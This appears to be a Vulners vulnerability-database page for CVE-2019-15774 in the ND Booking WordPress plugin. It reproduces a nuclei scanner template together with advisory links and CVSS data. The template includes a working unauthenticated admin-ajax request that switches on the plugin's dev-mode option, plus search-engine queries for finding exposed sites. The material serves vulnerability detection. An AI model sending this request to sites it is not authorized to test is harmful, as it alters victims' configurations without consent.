Lucene search
K

ND Booking < 2.5 - Unauthenticated Options Change

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

ND Booking plugin below version 2.5 has unauthenticated options change (CVE-2019-15774).

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-15774
18 Sep 202511:49
circl
CNVD
WordPress nd-booking Plugin Unauthorized Operation Vulnerability
2 Sep 201900:00
cnvd
CVE
CVE-2019-15774
29 Aug 201911:42
cve
Cvelist
CVE-2019-15774
29 Aug 201911:42
cvelist
EUVD
EUVD-2019-6698
7 Oct 202500:30
euvd
NVD
CVE-2019-15774
29 Aug 201912:15
nvd
OSV
CVE-2019-15774
29 Aug 201912:15
osv
Prion
Code injection
29 Aug 201912:15
prion
RedhatCVE
CVE-2019-15774
22 May 202507:37
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2019-15774
5 Aug 201900:00
vulncheck_kev
Rows per page
id: CVE-2019-15774

info:
  name: ND Booking < 2.5 - Unauthenticated Options Change
  author: popcorn94
  severity: medium
  description: |
    The Hotel Booking WordPress plugin ND Booking < 2.5 was affected by an Unauthenticated Options Change security vulnerability.
  impact: |
    Unauthenticated attackers can modify WordPress plugin options, potentially enabling development mode or altering plugin configuration to facilitate further attacks or compromise site functionality.
  remediation: |
    Update the ND Booking plugin to version 2.5 or later.
  reference:
    - https://wpscan.com/vulnerability/fb211b8b-5c32-40df-b197-bb51fc672b4b/
    - https://blog.nintechnet.com/privilege-escalation-vulnerability-in-wordpress-nd-booking-plugin/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-15774
    cwe-id: CWE-601
    epss-score: 0.01731
    epss-percentile: 0.74831
    cpe: cpe:2.3:a:booking_project:booking:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    vendor: booking_project
    product: booking
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/nd-booking"
    fofa-query: body="/wp-content/plugins/nd-booking/"
    publicwww-query: "/wp-content/plugins/nd-booking/"
  tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/nd-booking/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Booking WP plugin')"
          - compare_versions(version, '< 2.5')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=nd_booking_import_settings_php_function&nd_booking_value_import_settings=nd_booking_plugin_dev_mode%5Bnd_booking_option_value%5D1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Updated option \"nd_booking_plugin_dev_mode\" with the same value."
          - "Updated option \"nd_booking_plugin_dev_mode\" with 1."
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402206f2c240d8315c53ec62da161e492366f6cfe0b46f5ddbf539b94cff8f29e0ae302206368bd445fcba9b85adc45161d9ef9bb73e7cb54fc67e2d5cd6b46e5e39edf6f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 25.8
CVSS 36.1
EPSS0.01731
20